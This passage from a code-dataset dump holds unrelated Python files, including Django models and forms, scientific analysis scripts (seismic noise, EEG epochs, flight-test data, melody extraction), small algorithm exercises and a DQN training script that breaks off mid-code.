= models.CharField('заголовок первой сноски', max_length=100)\n slider = models.ImageField('Картинка слайдер 1', upload_to='ecoc/photos/')\n text_slider = models.TextField('надпись под картинкой-слайдером 1')\n slider1 = models.ImageField('Картинка слайдер 2', upload_to='ecoc/photos/')\n text_slider1 = models.TextField('надпись под картинкой-слайдером 2')\n slider2 = models.ImageField('Картинка слайдер 3', upload_to='ecoc/photos/')\n text_slider2 = models.TextField('надпись под картинкой-слайдером 3')\n slider3 = models.ImageField('Картинка слайдер 4', upload_to='ecoc/photos/')\n text_slider3 = models.TextField('надпись под картинкой-слайдером 4')\n slider4 = models.ImageField('Картинка слайдер 5', upload_to='ecoc/photos/')\n text_slider4 = models.TextField('надпись под картинкой-слайдером 5')\n slider5 = models.ImageField('Картинка слайдер 6', upload_to='ecoc/photos/')\n text_slider5 = models.TextField('надпись под картинкой-слайдером 6')\n title_2 = models.CharField('заголовок второй сноски', max_length=100)\n text1 = models.TextField('надпись второй сноски1')\n text11 = models.TextField('Вторая колонки сноски1', null=True, blank=True)\n picture_big = models.ImageField('Большая картинка вторая сноска', upload_to='ecoc/photos/')\n text2 = models.TextField('надпись второй сноски2')\n picture_little = models.FileField('первая маленькая картинка, вторая сноска', upload_to='ecoc/photos/')\n text3 = models.TextField('надпись второй сноски2')\n picture_little1 = models.FileField('вторая маленькая картинка, вторая сноска', upload_to='ecoc/photos/')\n text4 = models.TextField('надпись второй сноски2')\n picture_little2 = models.FileField('третья маленькая ка��тинка, вторая сноска', upload_to='ecoc/photos/')\n title_3 = models.CharField('Заголовок вопрос-ответ', max_length=100)\n title_4 = models.CharField('Заголовок заказа', max_length=100)\n\n\nclass Shop(models.Model):\n link_url = models.URLField('ссылка на магазин', null=True, blank=True)\n image_for = models.ImageField('картинка партнера', null=True, blank=True, upload_to='ecoc/photos/')\n event = models.CharField('event', null=True, blank=True, max_length=100)\n\n\nclass Faq(models.Model):\n question = models.TextField('Вопрос')\n answer = models.TextField('Ответ')\n","sub_path":"cis/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"272165796","text":"from datetime import (\n datetime,\n time,\n timedelta,\n)\nfrom ..forms import AjaxForm\nfrom ..forms.fields import (\n login_field,\n first_name_field,\n last_name_field,\n lead_time_field,\n start_date_field,\n end_date_field,\n welcome_message_field,\n)\n\n\n# dates in the past\ndef date_in_the_past(form, field_data, extra_data):\n if field_data:\n if datetime.combine(field_data, time()) < datetime.now():\n return {'valid': False,\n 'message': 'Date is in the past!',\n 'color': 'warning'}\n\n\n# start date < end date\ndef end_date_before_start_date(form, end_date, extra_data):\n start_date = form.data.get('start_date')\n if end_date and start_date and start_date > end_date:\n return {'valid': False,\n 'message': 'Start date can not be less than end date!',\n 'color': 'warning'}\n\n\n# date > 1 year\ndef date_futuristic(form, date, extra_data):\n if date:\n future_max = datetime.now() + timedelta(days=365)\n if datetime.combine(date, time()) > future_max:\n return {'valid': False,\n 'message': 'Date more then one year from now!',\n 'color': 'warning'}\n\n\nclass InvitationForm(AjaxForm):\n json_validators = [('start_date', date_in_the_past),\n ('start_date', date_futuristic),\n ('end_date', date_in_the_past),\n ('end_date', end_date_before_start_date)]\n email = login_field\n first_name = first_name_field\n last_name = last_name_field\n lead_time = lead_time_field\n start_date = start_date_field\n end_date = end_date_field\n welcome_message = welcome_message_field\n\n\nclass EditInvitationForm(AjaxForm):\n json_validators = [('start_date', date_in_the_past),\n ('start_date', date_futuristic),\n ('end_date', date_in_the_past),\n ('end_date', end_date_before_start_date)]\n first_name = first_name_field\n last_name = last_name_field\n lead_time = lead_time_field\n start_date = start_date_field\n end_date = end_date_field\n welcome_message = welcome_message_field\n","sub_path":"mts/forms/invitation.py","file_name":"invitation.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"199047245","text":"##################################################################\n# USER INPUT\n##################################################################\n# path to project and source model\nprojectpath = '../'\nsourcepath = '.'\n# Resolution of the coastlines (only relevant for ocean distributions)\n# (see basemap documentation)\n# Use coarser for global and finer for regional models\ncoastres = 'i' \n# sampling rate of synthetic Green's function in Hz\nsampling_rate = 1.0\n# length of synthetic seismograms\nn_samples = 3600\n\n################\n# geography\n################\n# list distributions: 'homogeneous', 'ocean','gaussian_blob', 'from_file'\ndistribution_types = [\n'homogeneous'\n]\n# parameters for homogeneous, ocean: none\n# parameters for gaussian blob: center (lat,lon), sigma_radius_m, only_ocean\n# parameters for from_file: filename\ndistribution_params = [\nNone\n]\n\n################\n# spectra\n################\n# list spectra for the above distributions. 'gaussian','from_file'\nspectrum_types = ['gaussian']\n# parameters for gaussian: mean, standard deviation in Hz\nspectrum_params = [ {'mean':0.15,'std':0.02,'weight':5.}]\n###############################################################################\n\n\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport h5py\nfrom noisi.my_classes.basisfunction import BasisFunction\nfrom noisi.util.source_masks import get_source_mask\nfrom noisi.util.plot import plot_grid\ntry:\n from scipy.fftpack import next_fast_len\nexcept ImportError:\n from noisi.borrowed_functions.scipy_next_fast_len import next_fast_len\nfrom obspy.signal.invsim import cosine_taper\nimport json\n\nn = next_fast_len(2*n_samples-1) \nfreq = np.fft.rfftfreq(n,d=1./sampling_rate)\nprint(freq.shape)\ntaper = cosine_taper(len(freq),0.005)\n\ngrd = np.load(os.path.join(projectpath,'sourcegrid.npy'))\nsource_config = json.load(open(os.path.join(sourcepath,'source_config.json')))\nbfunc_type = source_config['spectra_decomposition']\nbfunc_K = source_config['spectra_nr_parameters']\n\n\nb = BasisFunction(bfunc_type,bfunc_K,N=len(freq))\n\n\n\n\n\nspectrum_coefficients = np.zeros((len(spectrum_types),bfunc_K))\ngeographic_weights = np.zeros((len(spectrum_types),grd.shape[-1]))\n\n\ndef gauss_spectrum(sparams):\n spec = taper*np.exp(-(freq-sparams['mean'])**2/\n (2*sparams['std']**2))\n return spec / np.max(np.abs(spec)) * sparams['weight']\n\n\nfor ix_spec in range(len(spectrum_types)):\n \n # get the spectrum\n if spectrum_types[ix_spec] == 'gaussian':\n spectrum = gauss_spectrum(spectrum_params[ix_spec])\n elif spectrum_types[ix_spec] == 'from_file':\n spectrum = np.load(spectrum_params[ix_spec])\n \n # decompose the spectra in the chosen basis\n coeff = b.coeff(spectrum)\n spectrum_coefficients[ix_spec,:] = coeff\n\n\n# get the geographic weights\nfor ix_geo in range(len(distribution_types)):\n\n if distribution_types[ix_geo] =='gaussian_blob':\n\n geographic_weights[ix_geo,:] = get_source_mask('gaussian',grd,\n coastres,distribution_params[ix_geo])\n print(geographic_weights[ix_geo])\n\n elif distribution_types[ix_geo] in ['ocean','homogeneous']:\n\n geographic_weights[ix_geo,:] = get_source_mask(\n distribution_types[ix_geo],grd,coastres)\n \n \n else:\n print(distributions)\n raise NotImplementedError('Unknown geographical distributions. \\\n Must be \\'gaussian\\', \\'homogeneous\\' or \\'ocean\\'.')\n\n\n# get the weighted sum for each location and save\n\nwith h5py.File(os.path.join(sourcepath,'step_0','starting_model.h5'),'w') as fh:\n fh.create_dataset('coordinates',data=grd.astype(np.float64))\n fh.create_dataset('frequencies',data=freq.astype(np.float64))\n fh.create_dataset('model',data=np.zeros((grd.shape[-1],bfunc_K)),\n dtype=np.float32)\n\n\n for ix_loc in range(grd.shape[-1]):\n\n for ix_spec in range(len(spectrum_types)):\n #print(geographic_weights[ix_spec,ix_loc])\n fh['model'][ix_loc,:] += geographic_weights[ix_spec,ix_loc] *\\\n spectrum_coefficients[ix_spec,:]\n\n \n\n fh.flush()\n fh['model'].attrs['spectral_basis'] = bfunc_type\n fh.create_dataset('surf_areas',data=np.ones(grd.shape[-1]))\n\nwith h5py.File(os.path.join(sourcepath,'step_0','base_model.h5'),'w') as fh:\n fh.create_dataset('coordinates',data=grd.astype(np.float64))\n fh.create_dataset('frequencies',data=freq.astype(np.float64))\n fh.create_dataset('model',data=np.empty((grd.shape[-1],bfunc_K)),\n dtype=np.float32)\n\n\n for ix_loc in range(grd.shape[-1]):\n\n for ix_spec in range(len(spectrum_types)):\n \n fh['model'][ix_loc,:] += spectrum_coefficients[ix_spec,:]\n\n fh.flush()\n fh['model'].attrs['spectral_basis'] = bfunc_type\n fh.create_dataset('surf_areas',data=np.ones(grd.shape[-1]))\n# plot\nfor ix_spec in range(len(spectrum_types)):\n spec = np.zeros(freq.shape)\n for i in range(bfunc_K):\n spec += b.basis_vector(i,len(freq)) \\\n * spectrum_coefficients[ix_spec,i]\n plt.plot(freq,spec,linewidth=2)\n\nplt.xlabel('Frequency (Hz)')\nplt.ylabel('Source power (scaled)')\nplt.savefig(os.path.join(sourcepath,'freq_distr_startingmodel.png'))\n#\n#plt.plot_grid(grd[0],grd[1],colored_by_frequency,\n# normalize=False,sequential=True,cmap='viridis')\n","sub_path":"noisi/test/testdata/testsrc/setting_up_testmodel/setup_noisesource_basis.py","file_name":"setup_noisesource_basis.py","file_ext":"py","file_size_in_byte":5295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"492713867","text":"import unittest\nimport requests\nfrom pathlib import Path\n\n\nfrom pysbolgraph.SBOL2Graph import SBOL2Graph as Graph\n\n\nSBOL2DIR = Path(__file__).parent.parent / \"SBOLTestSuite\" / \"SBOL2\"\nFILEPATHS = SBOL2DIR.glob(\"*.xml\")\nENDPOINT = \"https://validator.sbolstandard.org/validate/\"\n\n\nrequest = {\n 'options': {\n 'language': 'SBOL2',\n 'test_equality': True,\n 'check_uri_compliance': False,\n 'check_completeness': False,\n 'check_best_practices': False,\n 'continue_after_first_error': True,\n 'provide_detailed_stack_trace': False,\n 'insert_type': False,\n 'uri_prefix': 'http://foo/',\n 'main_file_name': 'main file',\n 'diff_file_name': 'comparison file',\n },\n 'return_file': False,\n 'main_file': None,\n 'diff_file': None\n}\n\n\ndef generate_test(path):\n def test(self):\n self.case = path.stem\n g = Graph()\n g.load(str(path))\n with open(path) as main:\n request['main_file'] = main.read()\n request['diff_file'] = g.serialize_xml().decode('utf-8')\n\n self.resp = requests.post(ENDPOINT, json=request).json()\n self.assertTrue(self.resp['valid'])\n return test\n\nclass MetaTestClass(type):\n\n @classmethod\n def __prepare__(mcls, name, bases):\n d = dict()\n for path in FILEPATHS:\n testname = f\"test_{path.stem}\"\n d[testname] = generate_test(path)\n return d\n\n\nclass TestValidation(unittest.TestCase, metaclass=MetaTestClass):\n pass\n","sub_path":"test/test_validation.py","file_name":"test_validation.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"649439229","text":"#! /usr/bin/env python\n# \n# main.py\n# \n# Main script governing all separate modules. -\n# 2018-03-07\n# \n# -----------------------------------------------------------------------------\n\n# Standard library modules\nimport sys\n\n# Import data\nimport data.pfdf\nimport data.ftis\nimport os\n\n# Thrust calculations\nfrom engine.thrust import Thrust\nfrom identification.liftCurve import LiftCurve, DragPolar\nfrom identification.elevator import Elevator, TrimCurve, StickForce\nfrom simulate.manoeuvre import Phugoid, ShortPeriod, AperiodicRoll, DutchRoll, DutchRollDamped, Spiral\nimport parameters.massAndBalance as massAndBalance\nfrom utils.airspeed import Airspeed\n\n# Filenames\nlinux = sys.platform == 'linux' # Boolean variable\nif linux: os.chdir('/home/emiel/flighttest/')\nexcelName = 'data/data/Post_Flight_Datasheet_Flight_2_DD_15_3_2018.xlsx'\nftisName = 'data/data/FTISxprt-20180315_102929.mat'\n\n# Import data - creates 'handles' for later processing \nsheet = data.pfdf.ExcelSheet(excelName) # Read data from Excel\nweights = data.pfdf.Weights(sheet) # Extract weights\n\n# Read data - ready to use in calculations via __getattribute__()\nstatdata = data.pfdf.StatData(sheet, 1) # Extract stationary measurements\nelevdata = data.pfdf.ElevData(sheet)\ncogshift = data.pfdf.COGshift(sheet)\n\ndata = data.ftis.FtisData(ftisName)\n\n# STATIONARY MEASUREMENTS\n# Thrust calculations\nthrustStat = Thrust('stat', statdata, weights, reload=False)\nthrustElev = Thrust('elev', elevdata, weights, reload=False)\n\n# Determine Lift curve and Drag polar\nliftCurve = LiftCurve(statdata, weights, thrustStat)\ndragPolar = DragPolar(liftCurve, thrustStat)\n\n# Determine Elevator characteristics\nelevator = Elevator(cogshift)\ntrimCurve = TrimCurve(elevator, elevdata, thrustElev, weights)\n# trimCurve.plot2()\nstickForce = StickForce(elevator, elevdata, weights)\nstickForce.plot()\nV = Airspeed(200, 0, 0, 0, weights)\n\n# liftCurve.plot()\n# dragPolar.plot()\n\n# DYNAMIC MEASUREMENTS\n# Get initial weight\ninitialWeight = massAndBalance.bem.scale + sum(weights.weights) + weights.fuelWeight\n\n# Manoeuvres\nph = Phugoid(initialWeight, data, -0.5626, -1.1642)\nshp = ShortPeriod(initialWeight, data, -0.5626, -1.1642)\nar = AperiodicRoll(initialWeight, data, -0.5626, -1.1642)\ndr = DutchRoll(initialWeight, data, -0.5626, -1.1642)\ndrd = DutchRollDamped(initialWeight, data, -0.5626, -1.1642)\nsp = Spiral(initialWeight, data, -0.5626, -1.1642)\n\n# Termination signal\nduration = 0.1\nfreq = 2000 \n# os.system('play --no-show-progress --null --channels 1 synth %s sine %f' % (duration, freq))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"206438917","text":"from ImageSplitting.ContourFinder import ContourFinder\nfrom ImageSplitting.ImageEllipsesProvider import ImageEllipsesProvider\n\n\nclass EllipseExtractor:\n\n def extract_ellipses(self, binary_mask):\n if not (len(binary_mask.shape) == 2 and binary_mask.shape[0] == binary_mask.shape[1]):\n raise Exception()\n image_size = binary_mask.shape[0]\n\n contours = ContourFinder().find_contours(binary_mask)\n field = ImageEllipsesProvider(contours, image_size)\n ellipses = field.build_ellipses()\n result = []\n\n for ellipse in ellipses:\n minx, miny, maxx, maxy = ellipse.get_overlap_ellipse().bounds\n center = (ellipse.center[0] - minx, ellipse.center[1] - miny)\n long_length, short_length = ellipse.long_length, ellipse.short_length\n angle = ellipse.angle\n minx, miny, maxx, maxy = [self._norm_index(value, image_size) for value in (minx, miny, maxx, maxy)]\n\n ellipse_params = ((center[0], center[1], long_length, short_length, angle), (minx, miny, maxx, maxy))\n result.append(ellipse_params)\n return result\n\n @staticmethod\n def _norm_index(value, image_size):\n if value < 0:\n return 0\n if value > image_size - 1:\n return image_size - 1\n return value\n","sub_path":"ImageSplitting/EllipseExtractor.py","file_name":"EllipseExtractor.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"106119478","text":"print('\\n\\t============ Epochs ============\\n')\n\n# Epochs\nepochs = mne.Epochs(raw,\n\t\t events=events, \n\t\t event_id=event_id, \n\t\t tmin=tmin, \n\t\t tmax=tmax, \n\t\t # baseline=baseline, # (None, 0) # Could be changed to baseline, changed\n\t\t picks=picks, # Changed from None to picks\n\t\t name='Unknown', \n\t\t preload=False, # Changed to True - Changed back to false or 52 baselines are calculated\n\t\t reject=None, \n\t\t flat=None, \n\t\t proj=True, \n\t\t decim=1, \n\t\t reject_tmin=None,\n\t\t reject_tmax=None, \n\t\t detrend=None, \n\t\t add_eeg_ref=True, \n\t\t on_missing='error', \n\t\t verbose=None)\n\n# VERY LONG, DOESN'T WORK\n# epochs = mne.Epochs(raw, events, event_id, tmin, tmax)\n\n# Save epochs to avoid recalculating later\n# epochs.save('epochs.fif')\n# saved_epochs = mne.read_epochs('sample-epo.fif')\n\nprint('\\n')\nprint(epochs)\nprint('\\n\\n')\n\n\n# QUESTION: WHAT ARE EVOKES AND ARE THEY NECESSARY?\n\nepoch_sit = epochs['SIT_GO']\n# epoch_stand = epochs['STAND_GO'].average()\n\nprint(epoch_sit)\n\n# Removed because FFT plot uses previous variable\n# epoch_sit_data = epoch_sit.get_data()\n# print(epoch_sit_data)\n\n'''\nevoked_sit = epoch_sit.average()\nprint(evoked_sit)\nevoked_sit.plot()\n'''\n\n'''\nevoked = epochs.average() # Average to create Evoked \ncov = mne.compute_covariance(epochs, tmax=0) # Calculate baseline covariance \nforward = mne.make_forward_solution(evoked.info, mri, src, bem, mindist=5.0) \ninverse = mne.minimum_norm.make_inverse_operator(evoked.info, forward, cov) \nstc = mne.minimum_norm.apply_inverse(evoked, inverse, \n lambda2=1. / 9.) # Source estimates \n'''\n'''\nevents2 = mne.find_events(raw, stim_channel='STI 014')\nprint(events[:5])\nevent_id2 = dict(ST_READY=1, SIT_GO=2)\n'''\n\n","sub_path":"Process/epochs.py","file_name":"epochs.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"511855397","text":"# series homework\ndef fibonacci(n):\n '''Return the nth value of the fibonacci series'''\n if n<0:\n print (\"value must be positive\")\n return\n if n==0:\n return 0\n elif n==1:\n return 1\n else:\n return fibonacci(n-1) + fibonacci(n-2)\n\nfor i in range(10):\n print(fibonacci(i))\n\ndef lucas(n):\n '''Return the nth value of the lucas series'''\n if n<0:\n print (\"value must be positive\")\n return\n if n==0:\n return 2\n elif n==1:\n return 1\n else:\n return lucas(n-1) + lucas(n-2)\n\ndef sum_series(n, first_val=0, second_val=1):\n '''\n Return the nth value of a series of numbers where the next number\n in the series is a summation of the previous two numbers.\n The first two values in the series are option input parameters\n to this function.\n '''\n if n<0:\n print (\"value must be positive\")\n return\n if n==0:\n return first_val\n elif n==1:\n return second_val \n else:\n return sum_series(n-1) + sum_series(n-2)\n\n# Tests for the functions in this file\n# test for fibonacci\nfibonacci(-2)\nassert fibonacci(5) == 5\n\n# test for lucas\nprint ('Testing lucas')\nlucas(-1)\n\nfor i in range(10):\n print(lucas(i))\n\n\n","sub_path":"students/cheryl/session02/series.py","file_name":"series.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"459643626","text":"__author__ = 'Michael'\n\n#Euler published the remarkable quadratic formula:\n#\n#n^2 + n + 41\n#\n#It turns out that the formula will produce 40 primes for the consecutive values n = 0 to 39.\n# However, when n = 40, 402 + 40 + 41 = 40(40 + 1) + 41 is divisible by 41, and certainly when n = 41, 41^2 + 41 + 41 is\n# clearly divisible by 41.\n#\n#Using computers, the incredible formula n^2 - 79n + 1601 was discovered, which produces 80 primes for the consecutive\n# values n = 0 to 79. The product of the coefficients, -79 and 1601, is -126479.\n#\n#Considering quadratics of the form:\n#\n#n^2 + an + b, where |a| < 1000 and |b| < 1000\n#\n#Find the product of the coefficients, a and b, for the quadratic expression that produces the maximum number\n# of primes for consecutive values of n, starting with n = 0.\n\nfrom problems import ProblemUtils\n\ndef doProblem():\n\n #We know b can only be in primes, because this has to work for n = 0\n primes = ProblemUtils.PrimesUpTo(1000)\n\n maxA, maxB, maxNum = 0, 0, 0\n\n for a in range(-1000, 1001):\n for b in primes:\n n = 0\n while 1:\n if not ProblemUtils.IsPrime(calculateQuadratic(n, a, b)):\n #We have consecutive primes from 0-n\n if n > maxNum:\n maxA, maxB, maxNum = a, b, n\n break\n n += 1\n return maxA * maxB\n\ndef calculateQuadratic(n, a, b):\n return n**2 + a*n + b","sub_path":"problems/level02/problem027.py","file_name":"problem027.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"354864351","text":"import vamp\nimport librosa\nimport numpy as np\nimport scipy.io.wavfile as wavfile\nimport matplotlib.pyplot as plt\n# This is the audio file we'll be analyzing.\n# You can download it here: http://labrosa.ee.columbia.edu/projects/melody/mirex05TrainFiles.zip\naudio_file = '../Tests/Amy_Winehouse_-_You_re_Wondering_Now-9b3lo5a3iEk.wav'\n# This is how we load audio using Essentia\nfm1, wav_data1 = wavfile.read(audio_file)\n\n# This is how we load audio using Librosa\naudio, sr = librosa.load(audio_file, mono=True)\ndata = vamp.collect(audio, sr, \"mtg-melodia:melodia\")\n# vector is a tuple of two values: the hop size used for analysis and the array of pitch values\n# Note that the hop size is *always* equal to 128/44100.0 = 2.9 ms\nhop, melody = data['vector']\nprint(hop)\nprint(melody)\n\ntimestamps = 8 * 128/44100.0 + np.arange(len(melody)) * (128/44100.0)\n# parameter values are specified by providing a dicionary to the optional \"parameters\" parameter:\nparams = {\"minfqr\": 100.0, \"maxfqr\": 4000.0, \"voicing\": 0.2, \"minpeaksalience\": 0.0}\n\ndata = vamp.collect(audio, sr, \"mtg-melodia:melodia\", parameters=params)\nhop, melody = data['vector']\n# Melodia returns unvoiced (=no melody) sections as negative values. So by default, we get:\nplt.figure(figsize=(18,6))\nplt.plot(timestamps, melody)\nplt.xlabel('Time (s)')\nplt.ylabel('Frequency (Hz)')\n\n\n\n\n# A clearer option is to get rid of the negative values before plotting\nmelody_pos = melody[:]\nmelody_pos[melody<=0] = 0\nplt.figure(figsize=(18,6))\nplt.plot(timestamps, melody_pos)\nplt.xlabel('Time (s)')\nplt.ylabel('Frequency (Hz)')\n\n# Finally, you might want to plot the pitch sequence in cents rather than in Hz. \n# This especially makes sense if you are comparing two or more pitch sequences \n# to each other (e.g. comparing an estimate against a reference).\nmelody_cents = 1200*np.log2(melody/55.0)\nmelody_cents[melody<=0] = 0\nplt.figure(figsize=(18,6))\nplt.plot(timestamps, melody_cents)\nplt.xlabel('Time (s)')\nplt.ylabel('Frequency (cents relative to 55 Hz)')\nplt.show()\n\nplt.show()\n","sub_path":"Audio_Processing/melody_extractor_demo.py","file_name":"melody_extractor_demo.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"95468754","text":"# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n def __str__(self):\n l = []\n n = self\n while n:\n l.append(n.val)\n n = n.next\n return l.__str__()\n def __repr__(self):\n return self.__str__()\nimport heapq\nclass Solution(object):\n def mergeKLists(self, lists):\n \"\"\"\n :type lists: List[ListNode]\n :rtype: ListNode\n \"\"\"\n lists = [(x.val, x) for x in lists if x]\n r=ListNode(0)\n r.next=None\n p=r\n heapq.heapify(lists)\n while len(lists) > 0:\n p.next = heapq.heappop(lists)[1]\n p = p.next\n c = p.next\n if c and len(lists)>0:\n heapq.heappush(lists, (c.val, c))\n return r.next\n\n def mergeKListsOld(self, lists):\n lists=filter(lambda x:x is not None, lists)\n lists.sort(key=lambda x:x.val)\n r=ListNode(0)\n r.next=None\n p=r\n while len(lists)>1:\n p.next=lists[0]\n p=p.next\n lists=lists[1:]\n c=p.next\n if c and len(lists)>0:\n l=0\n h=len(lists)+1\n while True:\n m=(l+h)/2\n if (m==0 or c.val>=lists[m-1].val) and (m==len(lists) or c.val<=lists[m].val):\n break\n elif (m > 0 and c.vallists[m].val\n l=m\n lists.insert(m,c)\n if len(lists) == 1:\n p.next = lists[0]\n return r.next\n \nif __name__ == '__main__':\n s = Solution()\n def toListNode(l):\n h = ListNode(0)\n tail = h\n for n in l:\n tail.next = ListNode(n)\n tail = tail.next\n return h.next\n def fromListNode(n):\n r = []\n while n:\n r.append(n.val)\n n = n.next\n return r\n\n import sys\n def printListNode(n):\n while n:\n sys.stdout.write(str(n.val)+' ')\n n = n.next\n print\n # printListNode(toListNode([1,2,3,4]))\n\n for l in open('data'):\n printListNode(s.mergeKLists(map(toListNode, eval(l))))\n \n\n","sub_path":"leetcode/23.merge-k-sorted-lists/src.py","file_name":"src.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"474002966","text":"#!/usr/bin/env python\n\n\"\"\"xml2json.py Convert XML to JSON\n\nRelies on ElementTree for the XML parsing. This is based on\npesterfish.py but uses a different XML->JSON mapping.\nThe XML->JSON mapping is described at\nhttp://www.xml.com/pub/a/2006/05/31/converting-between-xml-and-json.html\n\nRewritten to a command line utility by Hay Kranen < github.com/hay >\n\nXML JSON\n \"e\": null\ntext \"e\": \"text\"\n \"e\": { \"@name\": \"value\" }\ntext \"e\": { \"@name\": \"value\", \"#text\": \"text\" }\n texttext \"e\": { \"a\": \"text\", \"b\": \"text\" }\n text text \"e\": { \"a\": [\"text\", \"text\"] }\n text text \"e\": { \"#text\": \"text\", \"a\": \"text\" }\n\nThis is very similar to the mapping used for Yahoo Web Services\n(http://developer.yahoo.com/common/json.html#xml).\n\nThis is a mess in that it is so unpredictable -- it requires lots of testing\n(e.g. to see if values are lists or strings or dictionaries). For use\nin Python this could be vastly cleaner. Think about whether the internal\nform can be more self-consistent while maintaining good external characteristics\nfor the JSON.\n\nLook at the Yahoo version closely to see how it works. Maybe can adopt\nthat completely if it makes more sense...\n\nR. White, 2006 November 6\n\"\"\"\n\nimport xml.etree.cElementTree as ET\nimport optparse, sys, os\n\ndef elem_to_internal(elem,strip=1):\n\n \"\"\"Convert an Element into an internal dictionary (not JSON!).\"\"\"\n\n d = {}\n for key, value in elem.attrib.items():\n d[key] = value\n\n # loop over subelements to merge them\n for subelem in elem:\n v = elem_to_internal(subelem,strip=strip)\n tag = subelem.tag\n value = v[tag]\n try:\n # add to existing list for this tag\n d[tag].append(value)\n except AttributeError:\n # turn existing entry into a list\n d[tag] = [d[tag], value]\n except KeyError:\n # add a new non-list entry\n d[tag] = value\n text = elem.text\n tail = elem.tail\n if strip:\n # ignore leading and trailing whitespace\n if text: text = text.strip()\n if tail: tail = tail.strip()\n\n if tail:\n d['tail'] = tail\n\n if d:\n # use #text element if other attributes exist\n if text: d[\"data\"] = text\n else:\n # text is the value if no attributes\n d = text or None\n return {elem.tag: d}\n","sub_path":"xml2json.py","file_name":"xml2json.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"141801692","text":"#WAP: use of for loop in python\r\n\r\ndef DisplayF(value):\r\n print(\"o/p of For LOOp\")\r\n icnt = 0\r\n for icnt in range (0,value):\r\n print(\"Jay Ganesh\")\r\n\r\ndef DisplayW(value):\r\n print(\"o/p for whle loop\")\r\n icnt = 0\r\n while icnt float:\n \"\"\"Trains `mainDQN` with target Q values given by `targetDQN`\n Args:\n mainDQN (dqn.DQN): Main DQN that will be trained\n targetDQN (dqn.DQN): Target DQN that will predict Q_target\n train_batch (list): Minibatch of replay memory\n Each element is (s, a, r, s', done)\n [(state, action, reward, next_state, done), ...]\n Returns:\n float: After updating `mainDQN`, it returns a `loss`\n \"\"\"\n states = np.vstack([x[0] for x in train_batch])\n actions = np.array([x[1] for x in train_batch])\n rewards = np.array([x[2] for x in train_batch])\n next_states = np.vstack([x[3] for x in train_batch])\n done = np.array([x[4] for x in train_batch])\n\n X = states\n\n Q_target = rewards + DISCOUNT_RATE * np.max(targetDQN.predict(next_states), axis=1) * ~done\n\n y = mainDQN.predict(states)\n y[np.arange(len(X)), actions] = Q_target\n\n # Train our network using target and predicted Q values on each episode\n return mainDQN.update(X, y)\n\n\ndef get_copy_var_ops(*, dest_scope_name: str, src_scope_name: str) -> List[tf.Operation]:\n \"\"\"Creates TF operations that copy weights from `src_scope` to `dest_scope`\n Args:\n dest_scope_name (str): Destination weights (copy to)\n src_scope_name (str): Source weight (copy from)\n Returns:\n List[tf.Operation]: Update operations are created and returned\n \"\"\"\n # Copy variables src_scope to dest_scope\n op_holder = []\n\n src_vars = tf.get_collection(\n tf.GraphKeys.TRAINABLE_VARIABLES, scope=src_scope_name)\n dest_vars = tf.get_collection(\n tf.GraphKeys.TRAINABLE_VARIABLES, scope=dest_scope_name)\n\n for src_var, dest_var in zip(src_vars, dest_vars):\n op_holder.append(dest_var.assign(src_var.value()))\n\n return op_holder\n\n\ndef bot_play(mainDQN: dqn.DQN, env: lec_info.Env) -> None:\n \"\"\"Test runs with rendering and prints the total score\n Args:\n mainDQN (dqn.DQN): DQN agent to run a test\n env (gym.Env): Gym Environment\n \"\"\"\n state = env.reset()\n reward_sum = 0\n\n while True:\n action = np.argmax(mainDQN.predict(state))\n state, reward, done = env.step(action)\n reward_sum += reward\n\n if done:\n env.render()\n print(\"Total score: {}\".format(reward_sum))\n break\n\n\ndef main():\n # store the previous observations in replay memory\n replay_buffer = deque(maxlen=REPLAY_MEMORY)\n\n Ehistory = []\n Rhistory = []\n\n with tf.Session() as sess:\n mainDQN = dqn.DQN(sess, INPUT_SIZE, OUTPUT_SIZE, name=\"main\")\n targetDQN = dqn.DQN(sess, INPUT_SIZE, OUTPUT_SIZE, name=\"target\")\n sess.run(tf.global_variables_initializer())\n\n # initial copy q_net -> target_net\n copy_ops = get_copy_var_ops(dest_scope_name=\"target\",\n src_scope_name=\"main\")\n sess.run(copy_ops)\n # pre train\n for pre_episode in range(MAX_PRE_EPISODES):\n #np.random.seed(int(time.time()))\n e = 1. / ((pre_episode / 100) + 1)\n if e < 0.05:\n e = 0.05\n\n done = False\n step_count = 0\n state = env.reset(True) # set time to 1-array\n total_reward = 0\n\n while not done:\n if np.random.rand() < e:\n action = env.action_sample()\n else:\n # Choose an action by greedily from the Q-network\n action = np.argmax(mainDQN.predict(state))\n\n # Get new state and reward from environment\n next_state, reward, done = env.step(action)\n\n # Save the experience to our buffer\n replay_buffer.append((state, action, reward, next_state, done))\n\n if len(replay_buffer) > BATCH_SIZE:\n minibatch = random.sample(replay_buffer, BATCH_SIZE)\n loss, _ = replay_train(mainDQN, targetDQN, minibatch)\n\n if step_count % 